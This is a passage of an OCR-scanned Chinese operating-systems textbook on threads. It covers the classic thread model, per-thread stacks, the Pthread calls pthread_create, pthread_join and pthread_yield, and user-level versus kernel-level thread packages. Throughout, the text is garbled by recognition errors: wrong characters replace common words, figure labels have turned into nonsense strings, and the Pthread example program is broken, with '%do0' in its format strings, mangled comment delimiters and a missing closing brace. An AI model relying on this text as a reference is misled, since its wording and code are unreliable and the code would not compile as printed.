缓冲 区 中 ; 输出 线程 把 这 些 结果 写 到 磁盘 上 。 按 照 这 种 工作 方式 ， 输 
入 、 处 理 和 输出 可 以 全 部 同时 进行 。 当 然 ， 这 种 模型 只 有 当 系 统 调 用 只 
阻 竖 调 用 线程 而 不 是 阻 竖 整个 进程 时 ， 才 能 正常 工作 。 


2.2.2 经典 的 线程 模型 


既然 我 们 已 经 明白 为 什么 线程 会 有 用 以 及 如 何 使 用 它们 ， 不 如 让 我 
们 用 更 近 一 步 的 眼光 来 审查 一 下 上 面 的 想法 。 进 程 模型 基于 两 种 独立 的 
概念 : 资源 分 组 处 理 与 执行 。 有 时 ， 将 这 两 种 概念 分 开会 更 有 益 
引入 了 "线程 > 这 一 概念 。 我 们 将 移 来 看 经 典 的 线程 模型 ， 之 后 我 们 会 来 
研究 “模糊 进程 与 线程 分 界线 ”的 Linux 线 程 模型 。 











理解 进程 的 一 个 角度 是 ， 用 茶 种 方法 把 相关 的 资源 集中 在 一 起 。 进 
程 有 存放 程序 正文 和 数据 以 及 其 他 资源 的 地 址 空间 。 这 些 资 源 中 包括 打 
开 的 文件 、 子 进程 、 即 将 发 生 的 报警 、 信 号 处 理 程 序 、 账 号 信息 等 。 把 
它们 都 放 到 进程 中 可 以 更 容易 管理 。 








为 一 个 概念 是 ， 进 程 拥有 一 个 执行 的 线程 ， 通 常人 简写 为 线程 
(thread) 。 在 线程 中 有 一 个 程序 计数 器 ， 用 来 记录 接着 要 执行 哪 一 
指令 。 线 程 拥有 寄存 占 ， 用 来 保存 线程 当前 的 工作 变量 。 线 程 还 拥有 一 
个 堆栈 ， 用 来 记录 执行 历史 ， 其 中 每 一 帧 保存 了 一 个 已 调用 的 但 是 还 没 
有 从 中 返回 的 过 程 。 尽 管线 程 必须 在 某 个 进程 中 执行 ， 但 是 线程 和 它 的 
进程 是 不 同 的 概念 ， 并 且 可 以 分 别处 理 。 进 程 用 于 把 资源 集中 到 一 起 ， 
而 线程 则 是 在 CPU 上 被 调度 执行 的 实体 。 








线程 给 进程 模型 增加 了 一 项 内 容 ， 即 在 同一 个 进程 环境 中 ， 人 允许 彼 


此 之 间 有 较 大 独立 性 的 多 个 线程 执行 。 在 同一 个 进程 中 并 行 运行 多 个 线 
程 ， 是 对 在 同一 台 计 算 机 上 并 行 运 行 多 个 进程 的 模拟 。 在 前 一 种 情形 
下 ， 多 个 线程 共享 同一 个 地 址 空间 和 其 他 资源 。 而 在 后 一 种 情形 中 ， 多 
个 进程 共享 物理 内 存 、 磁 盘 、 打 印 机 和 其 他 资源 。 由 于 线程 具有 进程 的 
某 些 性 质 ， 所 以 有 时 被 称 为 轻 量 级 进程 〈lightweight process) 。 多 线程 
这 个 术语 ， 也 用 来 描述 在 同一 个 进程 中 允许 多 个 线程 的 情形 。 正 如 我 们 
在 第 1 章 中 看 到 的 ， 一 些 CPU 已 经 有 直接 硬件 支持 多 线程 ， 并 允许 线程 
切换 在 纳 秒 级 完成 。 


在 图 2-11a 中 ， 可 以 看 到 三 个 传统 的 进程 。 每 个 进程 有 自己 的 地 址 
空间 和 单个 控制 线程 。 相 反 ， 在 图 2-11b 中 ， 可 以 看 到 一 个 进程 带 有 三 
个 控制 线程 。 尽 管 在 两 种 情形 中 都 有 三 个 线程 ， 但 是 在 图 2-11a 中 ， 每 
一 个 线程 都 在 不 同 的 地 址 空间 中 运行 ， 而 在 图 2-11b 中 ， 这 三 个 线程 全 
部 在 相同 的 地 址 空间 中 运行 。 
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图 2-11 三 个 进程 ， 每 个 进程 有 一 个 线程 ; 一 个 进程 带 三 个 线程 


当 多 线程 进程 在 单 CPU 系 统 中 运行 时 ， 线 程 轮流 运行 。 在 图 2-1 
中 ， 我 们 已 经 看 到 了 进程 的 多 道 程序 设计 是 如 何 工作 的 。 通 过 在 多 个 进 
程 之 间 来 回 切换 ， 系 统制 造 了 不 同 的 顺序 进程 并 行 运 行 的 假象 。 多 线程 
的 工作 方式 也 是 类 似 的 。CPU 在 线程 之 间 的 快速 切换 ， 制 造 了 线程 并 行 
运行 的 假象 ， 好 似 它 们 在 一 个 比 实 际 CPU 慢 一 些 的 CPU 上 同时 运行 。 在 
一 个 有 三 个 计算 密集 型 线程 的 进程 中 ， 线 程 以 并 行 方式 运行 ， 每 个 线程 
在 一 个 CPU 上 得 到 了 真实 CPU 速度 的 三 分 之 一 。 





进程 中 的 不 同 线程 不 像 不 同 进程 之 间 那 样 存 在 很 大 的 独立 性 。 所 有 
的 线程 都 有 完全 一 样 的 地 址 空间 ， 这 意味 着 它 们 也 共 孚 同样 的 全 局 变 
量 。 由 于 各 个 线程 都 可 以 访问 进程 地 址 空间 中 的 每 一 个 内 存 地 址 ， 所 以 
一 个 线程 可 以 读 、 写 或 甚至 清除 男 一 个 线程 的 堆栈 。 线 程 之 间 是 没有 你 
护 的 ， 原 因 是 1) 不 可 能 ，2) 也 没有 必要 。 这 与 不 同 进 程 是 有 差别 的 。 
不 同 的 进程 会 来 自 不 同 的 用 户 ， 它 们 彼此 之 间 可 能 有 政 意 ， 一 个 进程 总 
古 由 茶 个 用 户 所 拥有 ， 访 用户 创建 多 个 线程 应 该 是 为 了 它们 之 间 的 合作 
而 不 是 彼此 间 和 争斗 。 除 了 共享 地 址 空间 之 外 ， 所 有 线程 还 共 至 同一 个 打 
开 文 件 集 、 子 进程 、 报 警 以 及 相关 信和 号 等 ， 如 图 2-12 所 示 。 这 样 ， 对 于 
三 个 没有 关系 的 线程 而 言 ， 应 该 使 用 图 2-11a 的 结构 ， 而 在 三 个 线程 实 
际 完成 同一 个 作业 ， 并 彼此 积极 密切 合作 的 情形 中 ， 图 2-11b 则 比较 合 
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每 个 进程 中 的 内 容 每 个 线程 中 的 内 容 
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子 进 程 状态 
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图 2-12 第 一 列 给 出 了 在 一 个 进程 中 所 有 线程 共享 的 内 容 ， 第 二 列 给 
出 了 每 个 线程 自己 的 内 容 





图 2-12 中 ， 第 一 列表 项 是 进程 的 属性 ， 而 不 是 线程 的 属性 。 例 如 ， 
如 果 一 个 线程 打开 了 一 个 文件 ， 该 文件 对 该 进程 中 的 其 他 线程 都 可 见 ， 
这 些 线程 可 以 对 该 文件 进行 读 写 。 由 于 资源 管理 的 单位 是 进程 而 非 线 
程 ， 所 以 这 种 情形 是 合理 的 。 如 宁 每 个 线程 有 其 上 自己 的 地 址 空间 、 打 开 
文件 、 即 将 发 生 的 报警 等 ， 那 么 它们 就 应 该 是 不 同 的 进程 了 。 线 程 概念 
试图 实现 的 是 ， 共 享 一 组 资源 的 多 个 线程 的 执行 能 力 ， 以 便 这 些 线程 可 
以 为 完成 某 一 任务 而 共同 工作 。 








和 传统 进程 一 样 〈“ 即 只 有 一 个 线程 的 进程 ) ， 线 程 可 以 处 于 知 干 种 
状态 的 任何 一 个 : 运行 、 阻 时 、 就 绪 或 终止 。 正 在 运行 的 线程 拥有 CPU 
并 且 是 活跃 的 。 被 阻 守 的 线程 正在 等 竺 茶 个 释放 它 的 事件 。 例 如 ， 当 一 
个 线程 执行 从 键盘 读 入 数据 的 系统 调用 时 ， 该 线程 就 被 阻 豆 直到 键入 了 
和 输入 为 止 。 线 程 可 以 被 阻 蹇 ， 以 便 等 待 订 个 外 部 事件 的 发 生 或 者 等 符 其 
他 线程 来 释放 它 。 残 绪 线 程 可 密 调 度 运行 ， 并 且 只 要 轮 到 它 束 很 快 可 以 


运行 。 线 程 状态 之 间 的 转换 和 进程 状态 之 间 的 转换 是 一 样 的 ， 如 图 2-2 
所 示 。 


认识 到 每 个 线程 有 其 自己 的 堆栈 很 重要 ， 如 图 2-13 所 示 。 每 个 线程 
的 堆栈 有 一 帧 ， 供 各 个 被 调用 但 是 还 没有 从 中 返回 的 过 程 使 用 。 在 该 帧 
中 存放 了 相应 过 程 的 局 部 变量 以 及 过 程 调 用 完成 之 后 使 用 的 返回 地 址 。 
例如 ， 如 果 过 程 X 调 用 过 程 Y， 而 Y 又 调用 Z， 那 么 当 Z 执 行 时 ， 供 X、Y 
和 Z 使 用 的 帧 会 全 部 存在 堆栈 中 。 通 常 每 个 线程 会 调用 不 同 的 过 程 ， 从 
而 有 一 个 各 自 不 同 的 执行 历史 。 这 就 是 为 什么 每 个 线程 需要 有 自己 的 堆 
栈 的 原因 。 
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图 2-13 每 个 线程 有 其 自己 的 堆栈 


在 多 线程 的 情况 下 ， 进 程 通常 会 从 当前 的 单个 线程 开始 。 这 个 线程 
有 能 力 通 过 调用 一 个 库 函 数 〈( 如 thread_create) 创建 新 的 线程 。 
thread_create 的 参数 专门 指定 了 新 线程 要 运行 的 过 程 名 。 这 里 ， 没 有 必 
要 对 新 线程 的 地 址 空间 加 以 规定 ， 因 为 新 线程 会 自动 在 创建 线程 的 地 址 
空间 中 运行 。 有 时 ， 线 程 是 有 层次 的 ， 它 们 具有 一 种 父子 关系 ， 但 是 ， 
通常 不 存在 这 样 一 种 关系 ， 所 有 的 线程 都 是 平等 的 。 不 论 有 无 层次 关 
系 ， 创 建 线程 通 冲 都 返回 一 个 线程 标识 待 ， 该 标识 符 就 是 新 线程 的 名 


RS 
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当 一 个 线程 完成 工作 后 ， 可 以 通过 调用 一 个 库 过 程 〈《 如 
thread_exit) 退出 。 该 线程 接 独 消失 ， 不 再 可 调度 。 在 东 些 线程 系统 
中 ， 通 过 调用 一 个 过 程 ， 例 如 thread_joimn， 一 个 线程 可 以 等 待 一 个 〈 特 
E) 线程 退出 。 这 个 过 程 阻塞 调用 线程 直到 那个 〈 特 定 ) 线程 退出 。 在 
这 种 情况 下 ， 线 程 的 创建 和 终止 非常 类 似 于 进程 的 创建 和 终止 ， 并 且 也 
有 痢 同 样 的 选项 。 





另 一 个 常见 的 线程 调用 是 thread_yield， 它 允许 线程 自动 放弃 CPU 从 
而 让 男 一 个 线程 运行 。 这 样 一 个 调用 是 很 重要 的 ， 因 为 不 同 于 进程 ， 
(线程 库 ) 无 法 利用 时 钟 中 断 强制 线程 让 出 CPU。 所 以 设法 使 线程 行 
为 “高 尚 ” 起 来 ， 并 且 随 着 时 间 的 推移 自动 交 出 CPU， 以 便 让 其 他 线程 有 
机 会 运行 ， 就 变 得 非常 重要 。 有 的 调用 允许 某 个 线程 等 待 另 一 个 线程 完 
成 某 些 任务 ， 或 等 待 一 个 线程 宣称 它 已 经 完成 了 有 关 的 工作 等 。 








通 名 而 言 ， 线 程 是 有 普 的 ， 但 是 线程 也 在 程序 设计 模式 中 引入 了 某 
种 程度 的 复杂 性 。 考 虑 一 个 UNIX 中 的 fork 系 统 调用 。 如 采 父 进程 有 多 个 
线程 ， 那 么 它 的 子 进 程 也 应 该 拥有 这 些 线程 吗 ? 如 条 不 是 ， 则 该 子 进程 
可 能 会 工作 不 正常 ， 因 为 在 该 子 进程 中 的 线程 都 是 绝对 必要 的 。 





然而 ， 如 果子 进程 拥有 了 与 父 进程 一 样 的 多 个 线程 ， 如 果 父 进程 在 
read 系 统 调用 比如 键盘 ) 上 被 阻 赛 了 会 及 生 什 么 情况 ? 是 两 个 线程 被 
阻塞 在 键盘 上 《一 个 属于 父 进程 ， 另 一 个 属于 子 进程 ) 吗 ? 在 键入 一 行 
输入 之 后 ， 这 两 个 线程 都 得 到 该 输入 的 副本 吗 ? 还 是 仅 有 父 进程 得 到 该 
输入 的 副本 ? 或 是 仅 有 子 进程 得 到 ? 类 似 的 问题 在 进行 网 络 连接 时 也 会 
出 现 。 

















男 一 类 问题 和 线程 共享 许多 数据 结构 的 事实 有 关 。 如 果 一 个 线程 关 
闭 了 某 个 文件 ， 而 男 一 个 线程 还 在 该 文件 上 进行 读 操 作 时 会 怎样 ? 假设 
有 一 个 线程 注意 到 几乎 没有 内 存 了 ， 并 开始 分 配 更 多 的 内 存 。 在 工作 一 
半 的 时 候 ， 发 生 线 程 切换 ， 新 线程 也 注意 到 几乎 没有 内 存 了 ， 并 且 也 开 
始 分 配 更 多 的 内 存 。 这 样 ， 内 存 可 能 会 分 配 两 次 。 不 过 这 些 问 题 通 过 努 
力 是 可 以 解决 的 。 总 之 ， 要 使 多 线程 的 程序 正确 工作 ， 就 需要 仔细 思考 
和 设计 。 











2.2.3 ” POSIX 线程 


为 实现 可 移植 的 线程 程序 ，IEEE 在 IEEE 标 准 1003.1c 中 定义 了 线程 
的 标准 。 它 定义 的 线程 包 叫 做 Pthread。 大 部 分 UNIX 系 统 都 支持 该 标 
准 。 这 个 标准 定义 了 超过 60 个 函数 调用 ， 如 果 在 这 里 列举 一 遍 就 太 多 
了 。 取 而 代 之 的 是 ， 我 们 将 仅仅 描述 一 些 主要 的 函数 ， 以 说 明 它 是 如 何 
工作 的 。 图 2-14 中 列举 了 这 些 函 数 调用 。 


线程 调用 


a THB 


等 待 一 个 特定 的 线程 退出 

释放 CPU 来 运行 另外 一 个 线程 
创建 并 初始 化 一 个 线程 的 属性 结构 
删除 一 个 线程 的 属性 结构 


图 2-14 一 些 Pthtead 的 函数 调用 








所 有 Pthread 线 程 都 有 某 些 特性 。 每 一 个 都 含有 一 个 标识 符 、 一 组 寄 
存 器 《包括 程序 计数 器 ) 和 一 组 存储 在 结构 中 的 属性 。 这 些 属性 包括 推 
栈 大 小 、 调 度 参数 以 及 使 用 线程 需要 的 其 他 项 目 。 





创建 一 个 新 线程 需要 使 用 pthread_create 调 用 。 新 创建 的 线程 的 线程 
标识 符 作 为 函数 值 返回 。 这 种 调用 有 意 看 起 来 很 像 fork 系 统 调用 ， 其 中 
线程 标识 符 起 着 PID 的 作用 ， 而 这 么 做 的 目的 主要 是 为 了 标识 在 其 他 调 





用 中 引用 的 线程 。 

当 一 个 线程 完成 分 配给 它 的 工作 时 ， 可 以 通过 调用 pthread_exit 来 终 
止 。 这 个 调用 终止 该 线程 并 释放 它 的 栈 。 

一 般 一 个 线程 在 继续 运行 前 需要 等 待 妨 一 个 线程 完成 它 的 工作 并 退 
出 。 可 以 通过 pthread_join 线 程 调用 来 等 每 别 的 特定 线程 的 终止 。 而 要 等 
待 线程 的 线程 标识 符 作为 一 个 参数 给 出 。 





有 时 会 出 现 这 种 情况 ， 一 个 线程 逻辑 上 没有 阻 窒 ， 但 感觉 上 它 已 经 
运行 了 足够 长 时 间 并 且 和 希望 给 另外 一 个 线程 机 会 去 运行 。 这 时 可 以 通过 
调用 pthread_yield 完 成 这 一 目标 。 而 进程 中 没有 这 种 调用 ， 因 为 假设 进 
程 间 会 有 激烈 的 竞争 性 ， 并 且 每 一 个 进程 都 希望 获得 它 所 能 得 到 的 所 有 
的 CPU 时 间 。 但 是 ， 由 于 同一 进程 中 的 线程 可 以 同时 工作 ， 并 且 它 们 的 
代码 总 是 由 同一 个 程序 员 编 写 的 ， 因 此 ， 有 时 程序 员 和 希望 它们 能 互相 给 
对 方 一 些 机 会 去 运行 。 











下 面 两 个 线程 调用 是 处 理 属性 的 。Pthread_attr_init 建 立 关 联 一 个 线 
程 的 属性 结构 并 初始 化 成 默认 值 。 这 些 值 〈 例 如 优先 级 ) 可 以 通过 修改 
属性 结构 中 的 域 值 来 改变 。 





最 后 ，pthread_attr_destroy 删 除 一 个 线程 的 属性 结构 ， 释 放 它 占用 
的 内 存 。 它 不 会 影响 调用 它 的 线程 。 这 些 线程 会 继续 存在 。 


为 了 更 好 地 了 解 Pthread 是 如 何 工 作 的 ， 考 虑 图 2-15 提 供 的 简单 例 
子 。 这 里 主 程序 在 宣布 它 的 意图 之 后 ， 循 环 NUMBER_OF_THREADS 
次 ， 每 次 创建 一 个 新 的 线程 。 如 果 线 程 创 建 失败 ， 会 打印 出 一 条 错误 信 
恩 然 后 退出 。 在 创建 完 所 有 线程 之 后 ， 主 程序 退出 。 





#include <pthread.h> 
#include <stdio.h> 
#include <stdlib.h> 


#define NUMBER_OF_THREADS 10 


void *print_hello_world(void *tid) 
{js 本 函数 输出 线程 的 标识 符 ， 然 后 退出 。 */ 
printf("Hello World. Greetings from thread %do0, tid); 


pthread_exit(NULL); 
} 


int main(int argc, char *argv[]) 
{jj: 主 程序 创建 10 个 线程 ， 然 后 退出 。 */ 


pthread_t threads[NUMBER_OF_THREADS]; 
int status, i; 


for(i=0; i < NUMBER_OF_THREADS; i++) { 
printf("Main here. Creating thread %d0, i); 
status = pthread_create(&threads[i], NULL, print_hello_world, (void *)i); 


if (status != 0) { 
printf("Oops. pthread_create returned error code %d0, status); 
exit(-1); 

} 


} 
exit(NULL); 





图 2-15 使 用 线程 的 一 个 例子 程序 


当 创建 一 个 线程 时 ， 它 打印 一 条 一 行 的 发 布 信息 ， 然 后 退出 。 这 些 


不 同 信息 交错 的 顺序 是 不 确定 的 ， 并 且 可 能 在 连续 运行 程序 的 情况 下 发 
生变 化 。 





前 面 描述 的 Pthread 调 用 无 论 如 何 也 不 是 屈指 可 数 的 这 几 个 ， 还 有 许 
多 的 调用 。 我 们 会 在 讨论 “进程 与 线程 同步 "之 后 再 来 研究 其 他 一 些 
Pthread 调 用 。 


2.2.4 ”在 用 户 空间 中 实现 线程 





有 两 种 主要 的 方法 实现 线程 包 : 在 用 户 空间 中 和 在 内 核 中 。 这 两 种 
方法 互 有 利 浆 ， 不 过 混合 实现 方式 也 是 可 能 的 。 我 们 现在 介绍 这 些 方 
法 ， 并 分 析 它 们 的 优点 和 缺点 。 








一 种 方法 是 把 整个 线程 包 放 在 用 户 空 间 中 ， 内 核对 线程 包 一 无 所 
知 。 从 内 核 角度 考虑 ， 就 是 按 正 常 的 方式 管理 ， 即 单线 程 进程 。 这 种 方 
法 第 一 个 ， 也 是 最 明显 的 优点 是 ， 用 户 级 线程 包 可 以 在 不 文 持 线 程 的 操 
作 系统 上 实现 。 过 去 所 有 的 操作 系统 都 属于 这 个 范围 ， 即 使 现在 也 有 一 
些 操作 系统 还 是 不 文 持 线程 。 一 方法 ， 可 以 用 函数 库 实现 线程 。 





所 有 的 这 类 实现 都 有 同样 的 通用 结构 ， 如 图 2-16a 所 示 。 线 程 在 一 
个 运行 时 系统 的 顶部 运行 ， 这 个 运行 时 系统 是 一 个 管理 线程 的 过 程 的 集 

。 我 们 已 经 见 过 其 中 的 四 个 过 程 : pthread_create，Ppthread_exit， 
pthread_join 和 pthread_yield。 不 过 ， 一 般 还 会 有 更 多 的 过 程 。 


进程 线程 


CD 


运行 时 系统 RER 进程 表 进程 表 ”线程 表 





a) b) 
图 2-16 aA PARA; bb) 由 内 核 管 理 的 线程 包 


在 用 户 空间 管理 线程 时 ， 每 个 进程 需要 有 其 专用 的 线程 表 (thread 
table) ， 用 来 跟踪 该 进程 中 的 线程 。 这 些 表 和 内 核 中 的 进程 表 类 似 ， 不 
过 筷 仅 仅 记 录 各 个 线程 的 属性 ， 如 每 个 线程 的 程序 计数 器 、 堆 栈 指针 、 
寄存 器 和 状态 等 。 该 线程 表 由 运行 时 系统 管理 。 当 一 个 线程 转换 到 就 绪 
状态 或 阻塞 状态 时 ， 在 该 线程 表 中 存放 重新 局 动 该 线程 所 需 的 信息 ， 与 
内 核 在 进程 表 中 存放 进程 的 信息 完全 一 样 。 





当 某 个 线程 做 了 一 些 会 引起 在 本 地 阻塞 的 事情 之 后 ， 例 如 ， 等 待 进 
程 中 另 一 个 线程 完成 某 项 工作 ， 它 调用 一 个 运行 时 系统 的 过 程 ， 这 个 过 
程 检查 该 线程 是 否 必须 进入 阻塞 状态 。 如 宁 是 ， 它 在 线程 表 中 保存 该 线 
程 的 寄存 右 《〈 即 它 本 喘 的 ) ， 碍 看 表 中 可 运行 的 就 绪 线 程 ， 并 把 新 线程 
的 保存 值 重 新 装 入 机 器 的 寄存 器 中 。 只 要 堆栈 指针 和 程序 计数 器 一 被 切 








换 ， 新 的 线程 就 又 目 动 投入 运行 。 如 果 机 器 有 一 条 保存 所 有 寄存 器 的 指 
令 和 为 一 条 装 入 全 部 寄存 器 的 指令 ， 那 么 整个 线程 的 切换 可 以 在 几 条 指 
令 内 完成 。 进 行 类 似 于 这 样 的 线程 切换 至 少 比 陷 入 内 核 要 快 一 个 数量 级 
CRTEZ) ， 这 是 使 用 用 户 级 线程 包 的 极 大 的 优点 。 


不 过 ， 线 程 与 进程 有 一 个 关键 的 差别 。 在 线程 完成 运行 时 ， 例 如 ， 
在 它 调用 thread_yield 时 ，pthread_yield 代 码 可 以 把 该 线程 的 信息 保存 在 
线程 表 中 ， 进 而 ， 它 可 以 调用 线程 调度 程序 来 选择 另 一 个 要 运行 的 线 
程 。 保 存 该 线程 状态 的 过 程 和 调度 程序 都 只 是 本 地 过 程 ， 所 以 启动 它们 
比 进 行内 核 调 用 效率 更 高 。 另 一 方面 ， 不 需要 陷阱 ， 不 需要 上 下 文 切 
换 ， 也 不 需要 对 内 存 高 速 缓存 进行 刷新 ， 这 就 使 得 线程 调度 非常 快捷 。 





用 户 级 线程 还 有 男 一 个 优点 。 它 允许 每 个 进程 有 自己 定制 的 调度 算 
法 。 例 如 ， 在 茶 些 应 用 程序 中 ， 那 些 有 垃圾 收集 线程 的 应 用 程序 就 不 用 
担心 线程 会 在 不 合适 的 时 刻 停止 ， 这 是 一 个 长 处 。 用 户 级 线程 还 具有 较 
好 的 可 扩展 性 ， 这 是 因为 在 内 核 空 间 中 内 核 线程 需要 一 些 固定 表格 空间 
和 堆栈 空间 ， 如 果 内 核 线 程 的 数量 非常 大 ， 束 会 出 现 问题 。 








尽管 用 户 级 线程 包 有 更 好 的 性 能 ， 但 它 也 存在 一 些 明显 的 问题 。 其 
中 第 一 个 问题 是 如 何 实现 阻塞 系统 调用 。 假 设 在 还 没有 任何 击 键 之 前 ， 
一 个 线程 读 取 键盘 。 让 该 线程 实际 进行 该 系统 调用 是 不 可 接受 的 ， 因 为 
这 会 停止 所 有 的 线程 。 使 用 线程 的 一 个 主要 目标 是 ， 首 先 要 允许 每 个 线 
程 使 用 阻 竖 调用 ， 但 是 还 要 避免 被 阻塞 的 线程 影 呈 其 他 的 线程 。 有 了 阻 








徐 系 统 调用 ， 这 个 目标 不 是 轻易 地 能 够 实现 的 。 


系统 调用 可 以 全 部 改 成 非 阻 窄 的 〈 例 如， 如果 没 有 被 缓冲 的 字符 ， 
对 键盘 的 read 操 作 可 以 只 返回 0 字 节 ) ， 但 是 这 需要 修改 操作 系统 ， 所 
以 这 个 办 法 也 不 吸引 人 。 而 且 ， 用 户 级 线程 的 一 个 长 处 束 是 它 可 以 在 现 
有 的 操作 系统 上 运行 。 另 外 ， 改 变 read 操 作 的 语义 需要 修改 许多 用 户 程 
序 。 














在 这 个 过 程 中 ， 还 有 一 种 可 能 的 蔡 代 方案 ， 就 是 如 果菜 个 调用 会 阻 
守 ， 惑 提前 通知 。 在 某 些 UNIX 版 本 中 ， 有 一 个 系统 调用 select 可 以 允许 
调用 者 通知 预期 的 read 是 否 会 阻塞 。 若 有 这 个 调用 ， 那 么 库 过 程 read 就 
可 以 被 新 的 操作 替代 ， 首 先进 行 sSelect 调 用 ， 然 后 只 有 在 安全 的 情形 下 
《 即 不 会 阻塞 ) 才 进 行 read 调 用 。 如 果 read 调 用 会 被 阻 晨 ， 有 关 的 调用 
就 不 进行 ， 代 之 以 运行 另 一 个 线程 。 到 了 下 次 有 关 的 运行 系统 取得 控制 
权 之 后 ， 融 可 以 再 次 检查 看 看 现在 进行 read 调 用 是 否 安全 。 这 个 处 理 方 
法 需要 重 写 部 分 系统 调用 库 ， 所 以 效率 不 高 也 不 优雅 ， 不 过 没有 其 他 的 
可 选 方案 了 。 在 系统 调用 周围 从 事 检 查 的 这 类 代码 称 为 包 厂 器 (jacket 
或 wrapper) 。 


与 阻塞 系统 调用 问题 有 些 关 似 的 是 页 面 故 障 问题 。 我 们 将 在 第 3 章 
讨论 这 些 问题 。 此 刻 可 以 认为 ， 把 计算 机 设置 成 这 样 一 种 工作 方式 ， 即 
并 不 是 所 有 的 程序 都 一 次 性 放 在 内 存 中 。 如 果 茶 个 程序 调用 或 者 跳 转 到 
了 一 条 不 在 内 存 的 指令 上 ， 束 会 及 生 页 面 故障 ， 而 操作 系统 将 到 磁 副 上 


取 回 这 个 丢失 的 指令 (和 该 指令 的 “邻居 们 ”) ， 这 束 称 为 页 面 故障 。 在 
对 所 需 的 指令 进行 定位 和 读 入 时 ， 相 关 的 进程 束 被 阻 窒 。 如 果 有 一 个 线 
程 引起 页 面 故障 ， 内 核 由 于 甚至 不 知道 有 线程 存在 ， 通 常会 把 整个 进程 
阻 竖 直到 磁盘 IO 完成 为 目 ， 尽 管 其 他 的 线程 是 可 以 运行 的 。 








用 户 级 线程 包 的 另 一 个 问题 是 ， 如 有 果 一 个 线程 开始 运行 ， 那 么 在 该 
进程 中 的 其 他 线程 就 不 能 运行 ， 除 非 第 一 个 线程 目 动 放弃 CPU。 在 一 个 
单独 的 进程 内 部 ， 没 有 时 钟 中 新， 所 以 不 可 能 用 轮转 调度 《轮流 ) 的 方 
式 调度 进程 。 除 非 茶 个 线程 能 够 按照 自己 的 意志 进入 运行 时 系统 ， 人 否则 
调度 程序 束 没 有 任何 机 会 。 








对 线程 永久 运行 问题 的 一 个 可 能 的 解决 方案 十 让 运行 时 系统 请 求 每 
秒 一 次 的 时 钟 信号 中断 〉， 但 是 这 样 对 程序 也 是 生硬 和 无 序 的 。 不 可 
能 总 是 高 频率 地 发 生 周期 性 的 时 钟 中 断 ， 即 使 可 能 ， 总 的 开销 也 是 可 观 
的 。 而 且 ， 线 程 可 能 也 需要 时 钟 中 断 ， 这 就 会 扰乱 运行 时 系统 使 用 的 时 
钟 。 








再 者 ， 也 许 反 对 用 户 级 线程 的 最 大 负面 争论 意见 是 ， 程 序 员 通 闻 在 
经 党 发 生 线程 阻塞 的 应 用 中 才 和 希望 使 用 多 个 线程 。 例 如 ， 在 多 线程 Web 
服务 器 里 。 这 些 线程 持续 地 进行 系统 调用 ， 而 一 旦 发 生 内 核 陷阱 进行 系 
统 调用 ， 如 果 原 有 的 线程 已 经 阻塞 ， 就 很 难 让 内 核 进行 线程 的 切换 ， 如 
末 要 让 和 内 核 消 除 这 种 情形 ， 就 要 持续 进行 select 系 统 调 用 ， 以 便 检 查 read 
系统 调用 是 否 安全 。 对 于 那些 基本 上 是 CPU 密集 型 而 且 极 少 有 阻塞 的 应 











用 程序 而 言 ， 使 用 多 线程 的 目的 又 何在 呢 ? 由 于 这 样 的 做 法 并 不 能 得 到 
任何 益处 ， 所 以 没有 人 会 真正 提出 使 用 多 线程 来 计算 前 n 个 素数 或 者 下 
象棋 等 一 类 工作 。 


2.2.5 在 内 核 中 实现 线程 


现在 我 们 研究 内 核 了 解 和 管理 线程 的 情形 。 如 图 2-16b 所 示 ， 此 时 
不 再 需要 运行 时 系统 了 。 另 外 ， 每 个 进程 中 也 没有 线程 表 。 相 反 ， 在 内 
核 中 有 用 来 记录 系统 中 所 有 线程 的 线程 表 。 当 某 个 线程 希望 创建 一 个 新 
线程 或 撤销 一 个 已 有 线程 时 ， 它 进行 一 个 系统 调用 ， 这 个 系统 调用 通过 
对 线程 表 的 更 新 完成 线程 创建 或 撤销 工作 。 











内 核 的 线程 表 保 存 了 每 个 线程 的 寄存 器 、 状 态 和 其 他 信息 。 这 些 信 
妃 和 在 用 户 空间 中 《在 运行 时 系统 中 ) 的 线程 是 一 样 的 ， 但 是 现在 保存 
在 内 核 中 。 这 些 信 息 是 传统 内 核 所 维护 的 每 个 单线 程 进程 信息 《〈 即 进程 
状态 ) 的 子 集 。 为 外 ， 内 核 还 维护 了 传统 的 进程 表 ， 以 便 跟 中 进程 的 状 
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所 有 能 够 阻塞 线程 的 调用 都 以 系统 调用 的 形式 实现 ， 这 与 运行 时 系 
统 过 程 相 比 ， 代 价 是 相当 可 观 的 。 当 一 个 线程 阻塞 时 ， 内 核 根 据 其 选 
择 ， 可 以 运行 同一 个 进程 中 的 男 一 个 线程 (大 有 一 个 束 绪 线程 或 者 运 
行 男 一 个 进程 中 的 线程 。 而 在 用 户 级 线程 中 ， 运 行 时 系统 始终 运行 目 己 
进程 中 的 线程 ， 直 到 内 核 剥 村 它 的 CPU 或 者 没有 可 运行 的 线程 存在 
J) Aik. 


由 于 在 内 核 中 创建 或 撤销 线程 的 代价 比较 大 ， 茶 些 系统 采取 “ 环 


保 ? 的 处 理 方 式 ， 回 收 其 线程 。 当 茶 个 线程 被 撤销 时 ， 就 把 它 标 志 为 不 
可 运行 的 ， 但 是 其 内 核 数据 结构 没有 受到 影响 。 稻 后， 在 必须 创建 一 个 
新 线程 时 ， 就 重新 局 动 茶 个 旧 线 程 ， 从 而 节省 了 一 些 开销 。 在 用 户 级 线 
程 中 线程 回收 也 是 可 能 的 ， 但 是 由 于 其 线程 管理 的 代价 很 小 ， 所 以 没有 
必要 进行 这 项 工作 。 








内 核 线程 不 需要 任何 新 的 、 非 阻塞 系统 调用 。 另 外 ， 如 宋 茶 个 进程 
中 的 线程 引起 了 页 面 故 障 ， 内 核 可 以 很 方便 地 检查 该 进程 是 否 有 任何 其 
他 可 运行 的 线程 ， 如 果 有 ， 在 等 竺 所 希 要 的 页 面 从 磁盘 读 入 时 ， 台 选择 
一 个 可 运行 的 线程 运行 。 这 样 做 的 主要 缺点 是 系统 调用 的 代价 比较 大 ， 
所 以 如 果 线 程 的 操作 《创建 、 终 止 等 ) 比较 多 ， 就 会 带 来 很 大 的 开销 。 





虽然 使 用 内 核 线程 可 以 解决 很 多 问题 ， 但 是 不 会 解决 所 有 的 问题 。 
例如 ， 当 一 个 多 线程 进程 创建 新 的 进程 时 ， 会 发 生 什 么 ? 新 进程 是 拥有 
与 原 进 程 相同 数量 的 线程 ， 还 是 只 有 一 个 线程 ? 在 很 多 情况 下 ， 最 好 的 
选择 取决 于 进程 计划 下 一 步 做 什么 。 如 果 它 要 调用 exec 来 启动 一 个 新 的 
